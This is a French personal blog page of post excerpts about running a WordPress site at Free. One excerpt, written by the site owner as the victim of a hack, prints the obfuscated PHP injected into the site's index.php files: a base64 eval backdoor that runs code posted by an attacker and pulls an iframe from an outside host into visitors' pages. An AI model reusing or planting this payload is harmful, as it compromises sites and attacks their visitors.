Depuis quelques jours, le blog était inaccessible avec ce beau message d’erreur. J’ai d’abord cru à un problème temporaire chez Free, et je ne me suis pas trop inquiété.

Le problème persistant, je me suis rappelé que j’avais changé mes mots de passe pour accéder aux pages Free d’administration de mon compte. Et que j’avais oublié de mettre à jour le fichier wp-config.php. Je modifie en conséquence ce dernier, mais le problème persiste. La prise de tête commence.…

Comme chaque début d’année, c’est le moment de regarder un peu les statistiques du blog.

Le nombre de visites continue de monter : l’année dernière, on dépassait la barre des 6 000 visites plusieurs fois, cette année c’est la barre des 10 000 qui a été franchie deux fois.

Je n’ai publié que 71 articles cette année, contre 101 l’année dernière (et 96 l’année précédente)… En nette baisse donc. 🙁

Un premier plugin WP online counter, activé depuis le début du site ou presque (et affiché en bas de page), me donne un nombre total de visiteurs de 688 …

 Laisser les commentaires ouverts sur le blog, cela veut dire recevoir plein de spams.

J’utilise pour le filtrage le plugin Akismet qui fonctionne plutôt pas mal, qui est gratuit pour les particuliers, et fournit par défaut avec WordPress.

Le principe est simple : à chaque commentaire, il se connecte sur un de leurs serveurs pour une série de tests, et renvoie une réponse positive ou négative. Jusque là tout va bien.

J’avais toutefois pas mal de confirmation à faire manuellement (une vingtaine par jour) : commentaires détectés comme suspects par Akismet, mais qui n’ont pas pu être vérifiés, probablement parce …

Hier matin, le blog affichait en haut de page un beau message d’erreur. C’est Merlinux qui m’a prévenu par mail, car de mon côté tout était normal, alors que lui voyait le message suivant :

Après quelques vérifications, je me suis alors rendu compte que le fichier index.php (à la racine du site ET à la racine de wordpress) avaient été modifiés et comprenaient l’instruction suivante :

<?php /*68066*/ error_reporting(0); @ini_set('error_log',NULL);
@ini_set('log_errors',0); @ini_set('display_errors','Off'); 
@eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pd
CgwKTsKaWYgKGlzc2V0KCRfUE9TVFsnY29va2llc19pJ10pKSB7ZXZhbChiYXNlNjR
fZGVjb2RlKCRfUE9TVFsnY29va2llc19pJ10pKTt9CiR6Mzc9InN0YXRzIjsKJHVhM
z0kX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl07CiR1MzcgPSBhcnJheSgiR29vZ2x
lIiwgIlNsdXJwIiwgIk1TTkJvdCIsICJpYV9hcmNoaXZlciIsICJZYW5kZXgiLCAiU
mFtYmxlciIsICJNYWMiKTsKaWYoKHByZWdfbWF0Y2goIi8iIC4gaW1wbG9kZSgifCI
sICR1MzcpIC4gIi9pIiwgJHVhMykpIG9yIChpc3NldCgkX1NFUlZFUlsiSFRUUF9VU
0VSX0FHRU5UIl0pID09MCkgb3IgKGlzc2V0KCRfU0VSVkVSWyJIVFRQX0NPT0tJRSJ
dKSkpCnt9CmVsc2UKewpAc2V0Y29va2llKCR6MzcsbWQ1KCJzdGF0cyIpLHRpbWUoK
SsxNzI4MDApOwokaWQ9IjlvOGFhODhsOGVqaTEycmpmNWtva2VteGZ5amx6MXQiOwo
kdXJsPSJodHRwOi8vaWZyYW1lc2hvcC5uZXQvc3RpLnBocD9pZD0iLiRpZDsKJGlmc
mFtZT1AZmlsZV9nZXRfY29udGVudHMgKCR1cmwpOwppZiAoJGlmcmFtZSkgZWNobyg
kaWZyYW1lKTsgCn0K'));/*68066*/ ?

Mais qu’est-ce que ça veut dire ? Pour décoder tout ça, il suffit …

 Début janvier, j’ai publié les stats du blog, obtenues à l’aide du plugin WordPress.com Stats.

Un commentaire de Merlinux me demande alors des infos sur ce plugin ; je lui répond bien volontiers, et voilà qu’après avoir fait ses propres recherches, il m’informe que ce plugin envoie des infos chez Quantcast.

Quantcast est un service web de statistiques destinés aux annonceurs et commerçants. Il collecte des informations et les fournit pour une publicité ciblée.

J’étais très surpris, persuadé que la politique de confidentialité de WordPress était satisfaisante, et d’autre part n’ayant jamais vu aucune mention de ce traqueur intégré …

Après les cadeaux de Noël, les vœux de la nouvelle année, c’est le moment de regarder un peu les stats du blog, grâce au plugin WordPress.com Stats.

Côté nombre de visites, ça grimpe toujours doucement, selon une règle très simple : plus de contenu = plus de visites. Et donc on dépasse la barre des 6000 visites mensuelles plusieurs fois en 2011.

J’ai publié 101 articles cette année, contre 96 l’année dernière (voir les archives dans la colonne de gauche). C’est à peu près stable, et moins que les années précédentes, mais les articles sont plus élaborés qu’au …

Après le passage à WordPress 3.2.1, mon tableau de bord ne s’affichait plus complètement… la plupart du temps ! Problème de mémoire (limitée à 32 Mo chez Free), je commence à avoir l’habitude… restait à trouver quel plugin supprimer.

J’avais déjà dû supprimer WP-dTree lors du passage à la version 3.1.2… la cure d’amaigrissement continue donc, ce qui a finalement du bon : plus les pages sont légères et moins on charge de trucs plus ou moins utiles, mieux c’est !

C’est donc SyntaxHighlighter Evolved qui disparaît, le plugin qui permettait d’afficher les lignes de codes en y ajoutant …

La version 3.2 de WordPress est sortie le mois dernier, et le focus a été mis sur la rapidité et la légèreté. Ça valait peut-être le coup de l’installer chez Free… À noter également un nouveau mode plein écran quand on rédige un billet (le zen mode) qui a l’air bien sympathique.

Je prépare la mise à jour manuelle, télécharge les fichiers, lance la mise à jour et reçoit tout de suite un beau message très clair :

Votre serveur utilise la version 5.1.3RC4-dev de PHP mais WordPress 3.2.1 nécéssite au moins la version 5.2.4.

Effectivement, Free est à …

Hier soir, au moment d’aller me coucher, je m’aperçois (grâce à Conky) que quelqu’un essaie de se connecter sur mon PC !

Mais que se passe-t-il ? 🙄

Le port 22 étant celui de SSH (voir le fichier /etc/services), ma première réaction est d’arrêter mon service SSH.

sudo service ssh stop

Le service SSH permet de se connecter à distance sur mon PC. Comme tout service, c’est donc « une porte », et il suffit d’avoir la clef (nom utilisateur/mot de passe) pour rentrer. Il faut donc faire attention…

Je m’en sers très peu. Pour m’amuser, je l’avais …

Quelques petites modifications sur le blog… presque tout est visible sur l’image ci-contre.

De nouvelles petites icônes (encore, oui, mais cela améliore le rendu), la lecture des archives et de catégories qui affichent à la fois le début de l’article ET une image (si l’article en contient une), enfin la barre de recherche déplacée vers le haut.

Sans oublier le « Lire la suite » qui s’affiche à droite maintenant, avec une petite icône, comme vous pouvez le voir ci-dessous….…